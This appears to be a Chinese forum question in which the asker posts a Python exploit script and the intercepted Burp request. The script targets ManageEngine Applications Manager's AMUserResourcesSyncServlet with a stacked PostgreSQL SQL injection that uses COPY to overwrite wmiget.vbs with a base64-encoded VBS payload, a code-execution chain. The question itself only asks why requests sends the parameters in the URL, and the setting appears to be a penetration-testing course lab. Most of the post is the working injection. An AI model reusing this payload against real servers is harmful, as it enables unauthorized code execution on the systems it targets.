我下面有一个脚本,该脚本将定义的POST请求作为GET发送。该方法仍然是POST,但参数位于url中而不是正文中。
我不知道为什么要这么做。它不是对服务器的响应,因为这是在我的机器的第一个连接上发生的。我已经用Burp进行了拦截测试。
在以下脚本中我做了什么错事?
#!/usr/bin/python3
import requests
import urllib3
# import urllib
import base64
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def get_payload():
with open("/home/user/Dropbox/offsec/Code/4_ManageEngineSQL/oneline.vbs", "r") as file:
payload = file.read().encode("utf-8")
payload = base64.urlsafe_b64encode(payload)
# payload = urllib.parse.quote(payload)
return payload
def main():
url = 'https://manageengine:8443/servlet/AMUserResourcesSyncServlet'
sqli = f"1;COPY (SELECT convert_from(decode($${get_payload()}$$,$$base64$$),$$utf-8$$)) to $$C:\\Program Files (x86)\\ManageEngine\\AppManager12\\working\\conf\\application\\scripts\\wmiget.vbs$$;-- "
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
params = {"ForMasRange": "1", "userId": sqli}
s = requests.Session()
s.get(url, verify=False)
r = s.post(url, params=params, verify=False, proxies=proxies, headers=headers)
print(r.text)
print(r.headers)
if __name__ == '__main__':
main()
这就是截取的POST的样子,我已将有效负载部分截断了。
POST /servlet/AMUserResourcesSyncServlet?ForMasRange=1&userId=1%3BCOPY+%28SELECT+convert_from%28decode%28%24%24___payload_goes_here__%24%24base64%24%24%29%2C%24%24utf-8%24%24%29%29+to+%24%24C%3A%5CProgram+Files+%28x86%29%5CManageEngine%5CAppManager12%5Cworking%5Cconf%5Capplication%5Cscripts%5Cwmiget.vbs%24%24%3B--+ HTTP/1.1
Host: manageengine:8443
User-Agent: python-requests/2.23.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID_APM_9090=2F36D3F4A0A2B0826BA9695D192B73CB
Content-Length: 0